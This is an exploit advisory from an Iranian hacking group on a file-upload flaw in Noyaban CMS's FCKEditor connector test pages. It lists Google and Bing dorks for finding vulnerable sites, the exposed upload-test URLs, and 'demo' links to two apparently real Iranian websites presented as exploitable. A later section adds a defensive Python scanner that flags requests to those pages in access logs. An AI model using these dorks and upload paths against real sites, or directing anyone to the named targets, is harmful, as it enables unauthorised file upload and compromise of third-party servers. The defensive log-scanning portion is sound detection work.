Noyaban CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group, Published: 08-06-2015
# Exploit Title : Noyaban CMS File Upload Vulnerability (FCKEditor)

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : www.noyaban.com

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : intext:طراحی سایت و بهینه سازی سایت توسط نویابان

# Bing Dork : "طراحی سایت و بهینه سازی سایت توسط نویابان"

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Exploit 1 : site.com/fckeditor/editor/filemanager/browser/default/connectors/test.html

Exploit 2 : site.com/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

Demo :

http://setski.ir/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

http://www.djtravel.ir/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html
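
A defender-side check for the connector test pages listed in the PoC, added here as an example and not part of the original advisory: it scans web access logs for requests under that connectors directory and labels what each client did. The Common/Combined Log Format, the finding labels, and the sample lines (documentation IP ranges, placeholder handler name `example-handler`) are assumptions.

```python
import re
from urllib.parse import unquote

# Directory and test-page names taken from the PoC paths above.
CONNECTORS = "/fckeditor/editor/filemanager/browser/default/connectors/"
TEST_PAGES = ("test.html", "uploadtest.html")

# Assumption: access log in Common/Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')


def classify(line):
    """Return (ip, finding) for a request under the connectors directory, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode percent-encoding, and lowercase: the advisory
    # was tested on Windows, where URL paths are matched case-insensitively.
    path = unquote(m["target"].split("?", 1)[0]).replace("\\", "/").lower()
    if CONNECTORS not in path:
        return None
    ok = m["status"].startswith("2")
    if m["method"] == "POST":
        return m["ip"], "post-to-connector-2xx" if ok else "post-to-connector-non2xx"
    if path.rsplit("/", 1)[-1] in TEST_PAGES:
        return m["ip"], "test-page-exposed" if ok else "test-page-probe"
    return m["ip"], "connector-access"


def scan(lines):
    """Collect findings per client IP, in order of appearance."""
    report = {}
    for line in lines:
        hit = classify(line)
        if hit:
            report.setdefault(hit[0], []).append(hit[1])
    return report


# Constructed sample log lines (documentation IPs, placeholder handler name).
SAMPLE = [
    '192.0.2.10 - - [08/Jun/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Jun/2015:10:00:05 +0000] "GET /FCKeditor/editor/filemanager/browser/default/connectors/uploadtest.html HTTP/1.1" 200 4096',
    '198.51.100.7 - - [08/Jun/2015:10:00:09 +0000] "POST /fckeditor/editor/filemanager/browser/default/connectors/example-handler?a=1 HTTP/1.1" 200 120',
    '203.0.113.4 - - [08/Jun/2015:10:01:00 +0000] "GET /fckeditor/editor/filemanager/browser/default/connectors/%74est.html HTTP/1.1" 404 0',
]
```

A `test-page-exposed` finding means the server still serves the test page with a 2xx status; a `post-to-connector-2xx` from the same client shortly afterwards is the sequence to review first.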

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group
